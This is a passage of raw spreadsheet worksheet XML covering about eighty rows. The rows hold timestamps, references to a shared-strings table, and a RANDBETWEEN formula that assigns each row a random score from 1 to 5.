        <v>71</v>
      </c>
      <c r="E24113" s="2" t="s">
        <v>21840</v>
      </c>
      <c r="F24113">
        <f t="shared" ca="1" si="376"/>
        <v>3</v>
      </c>
    </row>
    <row r="24114" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24114" s="1">
        <v>42998.092326388891</v>
      </c>
      <c r="C24114" t="s">
        <v>60</v>
      </c>
      <c r="E24114" t="s">
        <v>21841</v>
      </c>
      <c r="F24114">
        <f t="shared" ca="1" si="376"/>
        <v>4</v>
      </c>
    </row>
    <row r="24115" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24115" s="1">
        <v>42998.048668981479</v>
      </c>
      <c r="C24115" t="s">
        <v>118</v>
      </c>
      <c r="E24115" s="2" t="s">
        <v>21842</v>
      </c>
      <c r="F24115">
        <f t="shared" ca="1" si="376"/>
        <v>3</v>
      </c>
    </row>
    <row r="24116" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24116" s="1">
        <v>42997.964131944442</v>
      </c>
      <c r="C24116" t="s">
        <v>41</v>
      </c>
      <c r="E24116" t="s">
        <v>21843</v>
      </c>
      <c r="F24116">
        <f t="shared" ca="1" si="376"/>
        <v>2</v>
      </c>
    </row>
    <row r="24117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24117" s="1">
        <v>42997.816504629627</v>
      </c>
      <c r="C24117" t="s">
        <v>10</v>
      </c>
      <c r="D24117" t="s">
        <v>36</v>
      </c>
      <c r="E24117" t="s">
        <v>21844</v>
      </c>
      <c r="F24117">
        <f t="shared" ca="1" si="376"/>
        <v>2</v>
      </c>
    </row>
    <row r="24118" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24118" s="1">
        <v>42997.779895833337</v>
      </c>
      <c r="C24118" t="s">
        <v>10</v>
      </c>
      <c r="D24118" t="s">
        <v>290</v>
      </c>
      <c r="E24118" t="s">
        <v>21845</v>
      </c>
      <c r="F24118">
        <f t="shared" ca="1" si="376"/>
        <v>5</v>
      </c>
    </row>
    <row r="24119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24119" s="1">
        <v>42997.712870370371</v>
      </c>
      <c r="C24119" t="s">
        <v>10</v>
      </c>
      <c r="D24119" t="s">
        <v>112</v>
      </c>
      <c r="E24119" t="s">
        <v>21846</v>
      </c>
      <c r="F24119">
        <f t="shared" ca="1" si="376"/>
        <v>3</v>
      </c>
    </row>
    <row r="24120" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24120" s="1">
        <v>42997.709687499999</v>
      </c>
      <c r="C24120" t="s">
        <v>10</v>
      </c>
      <c r="D24120" t="s">
        <v>23</v>
      </c>
      <c r="E24120" s="2" t="s">
        <v>21847</v>
      </c>
      <c r="F24120">
        <f t="shared" ca="1" si="376"/>
        <v>3</v>
      </c>
    </row>
    <row r="24121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24121" s="1">
        <v>42997.685752314814</v>
      </c>
      <c r="C24121" t="s">
        <v>6</v>
      </c>
      <c r="D24121" t="s">
        <v>25</v>
      </c>
      <c r="E24121" t="s">
        <v>21848</v>
      </c>
      <c r="F24121">
        <f t="shared" ca="1" si="376"/>
        <v>5</v>
      </c>
    </row>
    <row r="24122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24122" s="1">
        <v>42997.680543981478</v>
      </c>
      <c r="C24122" t="s">
        <v>10</v>
      </c>
      <c r="D24122" t="s">
        <v>86</v>
      </c>
      <c r="E24122" t="s">
        <v>21849</v>
      </c>
      <c r="F24122">
        <f t="shared" ca="1" si="376"/>
        <v>4</v>
      </c>
    </row>
    <row r="24123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24123" s="1">
        <v>42997.673761574071</v>
      </c>
      <c r="C24123" t="s">
        <v>10</v>
      </c>
      <c r="D24123" t="s">
        <v>89</v>
      </c>
      <c r="F24123">
        <f t="shared" ca="1" si="376"/>
        <v>5</v>
      </c>
    </row>
    <row r="24124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24124" s="1">
        <v>42997.651921296296</v>
      </c>
      <c r="C24124" t="s">
        <v>166</v>
      </c>
      <c r="E24124" t="s">
        <v>21850</v>
      </c>
      <c r="F24124">
        <f t="shared" ca="1" si="376"/>
        <v>5</v>
      </c>
    </row>
    <row r="24125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24125" s="1">
        <v>42997.64640046296</v>
      </c>
      <c r="C24125" t="s">
        <v>10</v>
      </c>
      <c r="D24125" t="s">
        <v>89</v>
      </c>
      <c r="F24125">
        <f t="shared" ca="1" si="376"/>
        <v>4</v>
      </c>
    </row>
    <row r="24126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24126" s="1">
        <v>42997.646261574075</v>
      </c>
      <c r="C24126" t="s">
        <v>6</v>
      </c>
      <c r="D24126" t="s">
        <v>25</v>
      </c>
      <c r="F24126">
        <f t="shared" ca="1" si="376"/>
        <v>3</v>
      </c>
    </row>
    <row r="24127" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24127" s="1">
        <v>42997.642824074072</v>
      </c>
      <c r="C24127" t="s">
        <v>6</v>
      </c>
      <c r="D24127" t="s">
        <v>25</v>
      </c>
      <c r="F24127">
        <f t="shared" ca="1" si="376"/>
        <v>3</v>
      </c>
    </row>
    <row r="24128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24128" s="1">
        <v>42997.604409722226</v>
      </c>
      <c r="C24128" t="s">
        <v>10</v>
      </c>
      <c r="D24128" t="s">
        <v>11</v>
      </c>
      <c r="E24128" t="s">
        <v>21851</v>
      </c>
      <c r="F24128">
        <f t="shared" ca="1" si="376"/>
        <v>2</v>
      </c>
    </row>
    <row r="24129" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24129" s="1">
        <v>42997.574942129628</v>
      </c>
      <c r="C24129" t="s">
        <v>10</v>
      </c>
      <c r="D24129" t="s">
        <v>6</v>
      </c>
      <c r="E24129" t="s">
        <v>21852</v>
      </c>
      <c r="F24129">
        <f t="shared" ca="1" si="376"/>
        <v>1</v>
      </c>
    </row>
    <row r="24130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24130" s="1">
        <v>42997.570370370369</v>
      </c>
      <c r="C24130" t="s">
        <v>10</v>
      </c>
      <c r="D24130" t="s">
        <v>178</v>
      </c>
      <c r="E24130" t="s">
        <v>21853</v>
      </c>
      <c r="F24130">
        <f t="shared" ref="F24130:F24193" ca="1" si="377">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="24131" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24131" s="1">
        <v>42997.527118055557</v>
      </c>
      <c r="C24131" t="s">
        <v>10</v>
      </c>
      <c r="D24131" t="s">
        <v>1036</v>
      </c>
      <c r="E24131" t="s">
        <v>21854</v>
      </c>
      <c r="F24131">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24132" s="1">
        <v>42997.521909722222</v>
      </c>
      <c r="C24132" t="s">
        <v>41</v>
      </c>
      <c r="E24132" t="s">
        <v>21855</v>
      </c>
      <c r="F24132">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24133" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A24133" s="1">
        <v>42997.520150462966</v>
      </c>
      <c r="C24133" t="s">
        <v>10</v>
      </c>
      <c r="D24133" t="s">
        <v>36</v>
      </c>
      <c r="E24133" s="2" t="s">
        <v>21856</v>
      </c>
      <c r="F24133">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24134" s="1">
        <v>42997.514618055553</v>
      </c>
      <c r="C24134" t="s">
        <v>6</v>
      </c>
      <c r="D24134" t="s">
        <v>25</v>
      </c>
      <c r="E24134" t="s">
        <v>21857</v>
      </c>
      <c r="F24134">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24135" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24135" s="1">
        <v>42997.509155092594</v>
      </c>
      <c r="C24135" t="s">
        <v>10</v>
      </c>
      <c r="D24135" t="s">
        <v>1036</v>
      </c>
      <c r="E24135" t="s">
        <v>21858</v>
      </c>
      <c r="F24135">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24136" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24136" s="1">
        <v>42997.451192129629</v>
      </c>
      <c r="C24136" t="s">
        <v>10</v>
      </c>
      <c r="D24136" t="s">
        <v>89</v>
      </c>
      <c r="E24136" s="2" t="s">
        <v>21859</v>
      </c>
      <c r="F24136">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24137" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24137" s="1">
        <v>42997.438611111109</v>
      </c>
      <c r="C24137" t="s">
        <v>10</v>
      </c>
      <c r="D24137" t="s">
        <v>52</v>
      </c>
      <c r="E24137" t="s">
        <v>21860</v>
      </c>
      <c r="F24137">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24138" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24138" s="1">
        <v>42997.421516203707</v>
      </c>
      <c r="C24138" t="s">
        <v>71</v>
      </c>
      <c r="E24138" s="2" t="s">
        <v>21861</v>
      </c>
      <c r="F24138">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24139" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24139" s="1">
        <v>42997.416701388887</v>
      </c>
      <c r="C24139" t="s">
        <v>10</v>
      </c>
      <c r="D24139" t="s">
        <v>36</v>
      </c>
      <c r="E24139" s="2" t="s">
        <v>21862</v>
      </c>
      <c r="F24139">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24140" s="1">
        <v>42997.408634259256</v>
      </c>
      <c r="C24140" t="s">
        <v>10</v>
      </c>
      <c r="D24140" t="s">
        <v>80</v>
      </c>
      <c r="E24140" t="s">
        <v>21863</v>
      </c>
      <c r="F24140">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24141" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24141" s="1">
        <v>42997.403449074074</v>
      </c>
      <c r="C24141" t="s">
        <v>10</v>
      </c>
      <c r="D24141" t="s">
        <v>89</v>
      </c>
      <c r="E24141" t="s">
        <v>21864</v>
      </c>
      <c r="F24141">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24142" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24142" s="1">
        <v>42997.397523148145</v>
      </c>
      <c r="C24142" t="s">
        <v>48</v>
      </c>
      <c r="E24142" s="2" t="s">
        <v>21865</v>
      </c>
      <c r="F24142">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24143" s="1">
        <v>42997.391041666669</v>
      </c>
      <c r="C24143" t="s">
        <v>10</v>
      </c>
      <c r="D24143" t="s">
        <v>89</v>
      </c>
      <c r="E24143" t="s">
        <v>21866</v>
      </c>
      <c r="F24143">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24144" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24144" s="1">
        <v>42997.390277777777</v>
      </c>
      <c r="C24144" t="s">
        <v>10</v>
      </c>
      <c r="D24144" t="s">
        <v>158</v>
      </c>
      <c r="E24144" s="2" t="s">
        <v>21867</v>
      </c>
      <c r="F24144">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24145" s="1">
        <v>42997.364837962959</v>
      </c>
      <c r="C24145" t="s">
        <v>10</v>
      </c>
      <c r="D24145" t="s">
        <v>56</v>
      </c>
      <c r="E24145" t="s">
        <v>21868</v>
      </c>
      <c r="F24145">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24146" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24146" s="1">
        <v>42997.352187500001</v>
      </c>
      <c r="C24146" t="s">
        <v>134</v>
      </c>
      <c r="E24146" s="2" t="s">
        <v>21869</v>
      </c>
      <c r="F24146">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24147" s="1">
        <v>42997.278252314813</v>
      </c>
      <c r="C24147" t="s">
        <v>127</v>
      </c>
      <c r="E24147" t="s">
        <v>21870</v>
      </c>
      <c r="F24147">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24148" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24148" s="1">
        <v>42997.246203703704</v>
      </c>
      <c r="C24148" t="s">
        <v>48</v>
      </c>
      <c r="E24148" t="s">
        <v>21871</v>
      </c>
      <c r="F24148">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24149" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24149" s="1">
        <v>42997.226793981485</v>
      </c>
      <c r="C24149" t="s">
        <v>65</v>
      </c>
      <c r="E24149" s="2" t="s">
        <v>21872</v>
      </c>
      <c r="F24149">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24150" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24150" s="1">
        <v>42997.207905092589</v>
      </c>
      <c r="C24150" t="s">
        <v>48</v>
      </c>
      <c r="E24150" s="2" t="s">
        <v>21873</v>
      </c>
      <c r="F24150">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24151" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24151" s="1">
        <v>42997.187789351854</v>
      </c>
      <c r="C24151" t="s">
        <v>318</v>
      </c>
      <c r="E24151" s="2" t="s">
        <v>21874</v>
      </c>
      <c r="F24151">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24152" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24152" s="1">
        <v>42997.184212962966</v>
      </c>
      <c r="C24152" t="s">
        <v>41</v>
      </c>
      <c r="E24152" t="s">
        <v>21875</v>
      </c>
      <c r="F24152">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24153" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24153" s="1">
        <v>42997.179270833331</v>
      </c>
      <c r="C24153" t="s">
        <v>410</v>
      </c>
      <c r="E24153" s="2" t="s">
        <v>21876</v>
      </c>
      <c r="F24153">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24154" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24154" s="1">
        <v>42997.151053240741</v>
      </c>
      <c r="C24154" t="s">
        <v>48</v>
      </c>
      <c r="E24154" t="s">
        <v>21877</v>
      </c>
      <c r="F24154">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24155" s="1">
        <v>42997.119432870371</v>
      </c>
      <c r="C24155" t="s">
        <v>41</v>
      </c>
      <c r="E24155" t="s">
        <v>21878</v>
      </c>
      <c r="F24155">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24156" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24156" s="1">
        <v>42997.010115740741</v>
      </c>
      <c r="C24156" t="s">
        <v>41</v>
      </c>
      <c r="E24156" t="s">
        <v>21879</v>
      </c>
      <c r="F24156">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24157" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24157" s="1">
        <v>42996.893101851849</v>
      </c>
      <c r="C24157" t="s">
        <v>140</v>
      </c>
      <c r="D24157" t="s">
        <v>234</v>
      </c>
      <c r="E24157" t="s">
        <v>21880</v>
      </c>
      <c r="F24157">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24158" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24158" s="1">
        <v>42996.873842592591</v>
      </c>
      <c r="C24158" t="s">
        <v>10</v>
      </c>
      <c r="D24158" t="s">
        <v>1056</v>
      </c>
      <c r="E24158" t="s">
        <v>21881</v>
      </c>
      <c r="F24158">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24159" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24159" s="1">
        <v>42996.866956018515</v>
      </c>
      <c r="C24159" t="s">
        <v>10</v>
      </c>
      <c r="D24159" t="s">
        <v>6</v>
      </c>
      <c r="E24159" s="2" t="s">
        <v>21882</v>
      </c>
      <c r="F24159">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24160" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24160" s="1">
        <v>42996.781631944446</v>
      </c>
      <c r="C24160" t="s">
        <v>10</v>
      </c>
      <c r="D24160" t="s">
        <v>6</v>
      </c>
      <c r="E24160" t="s">
        <v>21883</v>
      </c>
      <c r="F24160">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24161" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24161" s="1">
        <v>42996.71</v>
      </c>
      <c r="C24161" t="s">
        <v>10</v>
      </c>
      <c r="D24161" t="s">
        <v>480</v>
      </c>
      <c r="E24161" t="s">
        <v>21884</v>
      </c>
      <c r="F24161">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24162" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24162" s="1">
        <v>42996.68041666667</v>
      </c>
      <c r="C24162" t="s">
        <v>6</v>
      </c>
      <c r="D24162" t="s">
        <v>67</v>
      </c>
      <c r="E24162" t="s">
        <v>21885</v>
      </c>
      <c r="F24162">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24163" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24163" s="1">
        <v>42996.671747685185</v>
      </c>
      <c r="C24163" t="s">
        <v>10</v>
      </c>
      <c r="D24163" t="s">
        <v>6</v>
      </c>
      <c r="E24163" t="s">
        <v>21886</v>
      </c>
      <c r="F24163">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24164" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24164" s="1">
        <v>42996.666342592594</v>
      </c>
      <c r="C24164" t="s">
        <v>1341</v>
      </c>
      <c r="E24164" s="2" t="s">
        <v>21887</v>
      </c>
      <c r="F24164">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24165" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24165" s="1">
        <v>42996.664386574077</v>
      </c>
      <c r="C24165" t="s">
        <v>6</v>
      </c>
      <c r="D24165" t="s">
        <v>25</v>
      </c>
      <c r="E24165" t="s">
        <v>21888</v>
      </c>
      <c r="F24165">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24166" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24166" s="1">
        <v>42996.657465277778</v>
      </c>
      <c r="C24166" t="s">
        <v>10</v>
      </c>
      <c r="D24166" t="s">
        <v>11</v>
      </c>
      <c r="E24166" s="2" t="s">
        <v>21889</v>
      </c>
      <c r="F24166">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24167" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24167" s="1">
        <v>42996.634791666664</v>
      </c>
      <c r="C24167" t="s">
        <v>6</v>
      </c>
      <c r="D24167" t="s">
        <v>602</v>
      </c>
      <c r="E24167" t="s">
        <v>21890</v>
      </c>
      <c r="F24167">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24168" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24168" s="1">
        <v>42996.620567129627</v>
      </c>
      <c r="C24168" t="s">
        <v>43</v>
      </c>
      <c r="E24168" s="2" t="s">
        <v>21891</v>
      </c>
      <c r="F24168">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24169" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24169" s="1">
        <v>42996.594490740739</v>
      </c>
      <c r="C24169" t="s">
        <v>10</v>
      </c>
      <c r="D24169" t="s">
        <v>20</v>
      </c>
      <c r="E24169" t="s">
        <v>21892</v>
      </c>
      <c r="F24169">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24170" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24170" s="1">
        <v>42996.586342592593</v>
      </c>
      <c r="C24170" t="s">
        <v>10</v>
      </c>
      <c r="D24170" t="s">
        <v>290</v>
      </c>
      <c r="E24170" t="s">
        <v>21893</v>
      </c>
      <c r="F24170">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24171" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24171" s="1">
        <v>42996.585844907408</v>
      </c>
      <c r="C24171" t="s">
        <v>10</v>
      </c>
      <c r="D24171" t="s">
        <v>290</v>
      </c>
      <c r="E24171" t="s">
        <v>21894</v>
      </c>
      <c r="F24171">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24172" s="1">
        <v>42996.520983796298</v>
      </c>
      <c r="C24172" t="s">
        <v>103</v>
      </c>
      <c r="E24172" t="s">
        <v>21895</v>
      </c>
      <c r="F24172">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24173" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24173" s="1">
        <v>42996.518726851849</v>
      </c>
      <c r="C24173" t="s">
        <v>71</v>
      </c>
      <c r="E24173" s="2" t="s">
        <v>21896</v>
      </c>
      <c r="F24173">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24174" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24174" s="1">
        <v>42996.510497685187</v>
      </c>
      <c r="C24174" t="s">
        <v>6</v>
      </c>
      <c r="D24174" t="s">
        <v>821</v>
      </c>
      <c r="E24174" s="2" t="s">
        <v>21897</v>
      </c>
      <c r="F24174">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24175" s="1">
        <v>42996.495150462964</v>
      </c>
      <c r="C24175" t="s">
        <v>10</v>
      </c>
      <c r="D24175" t="s">
        <v>263</v>
      </c>
      <c r="E24175" t="s">
        <v>21898</v>
      </c>
      <c r="F24175">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24176" s="1">
        <v>42996.492025462961</v>
      </c>
      <c r="C24176" t="s">
        <v>10</v>
      </c>
      <c r="D24176" t="s">
        <v>52</v>
      </c>
      <c r="E24176" t="s">
        <v>21899</v>
      </c>
      <c r="F24176">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24177" s="1">
        <v>42996.475069444445</v>
      </c>
      <c r="C24177" t="s">
        <v>10</v>
      </c>
      <c r="D24177" t="s">
        <v>41</v>
      </c>
      <c r="E24177" t="s">
        <v>21900</v>
      </c>
      <c r="F24177">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24178" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24178" s="1">
        <v>42996.474641203706</v>
      </c>
      <c r="C24178" t="s">
        <v>65</v>
      </c>
      <c r="E24178" s="2" t="s">
        <v>21901</v>
      </c>
      <c r="F24178">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24179" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24179" s="1">
        <v>42996.473877314813</v>
      </c>
      <c r="C24179" t="s">
        <v>461</v>
      </c>
      <c r="E24179" s="2" t="s">
        <v>21902</v>
      </c>
      <c r="F24179">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24180" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24180" s="1">
        <v>42996.461608796293</v>
      </c>
      <c r="C24180" t="s">
        <v>10</v>
      </c>
      <c r="D24180" t="s">
        <v>158</v>
      </c>
      <c r="E24180" s="2" t="s">
        <v>21903</v>
      </c>
      <c r="F24180">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24181" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24181" s="1">
        <v>42996.457106481481</v>
      </c>
      <c r="C24181" t="s">
        <v>253</v>
      </c>
      <c r="E24181" t="s">
        <v>21904</v>
      </c>
      <c r="F24181">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24182" s="1">
        <v>42996.439942129633</v>
      </c>
      <c r="C24182" t="s">
        <v>260</v>
      </c>
      <c r="E24182" t="s">
        <v>21905</v>
      </c>
      <c r="F24182">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24183" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24183" s="1">
        <v>42996.43072916667</v>
      </c>
      <c r="C24183" t="s">
        <v>10</v>
      </c>
      <c r="D24183" t="s">
        <v>192</v>
      </c>
      <c r="E24183" s="2" t="s">
        <v>21906</v>
      </c>
      <c r="F24183">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24184" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24184" s="1">
        <v>42996.422546296293</v>
      </c>
      <c r="C24184" t="s">
        <v>60</v>
      </c>
      <c r="E24184" t="s">
        <v>21907</v>
      </c>
      <c r="F24184">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24185" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A24185" s="1">
        <v>42996.417812500003</v>
      </c>
      <c r="C24185" t="s">
        <v>10</v>
      </c>
      <c r="D24185" t="s">
        <v>80</v>
      </c>
      <c r="E24185" s="2" t="s">
        <v>21908</v>
      </c>
      <c r="F24185">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24186" s="1">
        <v>42996.410624999997</v>
      </c>
      <c r="C24186" t="s">
        <v>41</v>
      </c>
      <c r="E24186" t="s">
        <v>21909</v>
      </c>
      <c r="F24186">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24187" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24187" s="1">
        <v>42996.407083333332</v>
      </c>
      <c r="C24187" t="s">
        <v>559</v>
      </c>
      <c r="E24187" s="2" t="s">
        <v>21910</v>
      </c>
      <c r="F24187">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24188" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24188" s="1">
        <v>42996.403252314813</v>
      </c>
      <c r="C24188" t="s">
        <v>41</v>
      </c>
      <c r="E24188" s="2" t="s">
        <v>21911</v>
      </c>
      <c r="F24188">
        <f t="shared" ca="1" si="377"/>
        <v>2</v>
      </c>
    </row>
    <row r="24189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24189" s="1">
        <v>42996.384363425925</v>
      </c>
      <c r="C24189" t="s">
        <v>6</v>
      </c>
      <c r="D24189" t="s">
        <v>25</v>
      </c>
      <c r="E24189" t="s">
        <v>21912</v>
      </c>
      <c r="F24189">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24190" s="1">
        <v>42996.381296296298</v>
      </c>
      <c r="C24190" t="s">
        <v>10</v>
      </c>
      <c r="D24190" t="s">
        <v>192</v>
      </c>
      <c r="E24190" t="s">
        <v>21913</v>
      </c>
      <c r="F24190">
        <f t="shared" ca="1" si="377"/>
        <v>3</v>
      </c>
    </row>
    <row r="24191" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24191" s="1">
        <v>42996.373692129629</v>
      </c>
      <c r="C24191" t="s">
        <v>6</v>
      </c>
      <c r="D24191" t="s">
        <v>194</v>
      </c>
      <c r="E24191" t="s">
        <v>21914</v>
      </c>
      <c r="F24191">
        <f t="shared" ca="1" si="377"/>
        <v>4</v>
      </c>
    </row>
    <row r="24192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24192" s="1">
        <v>42996.371932870374</v>
      </c>
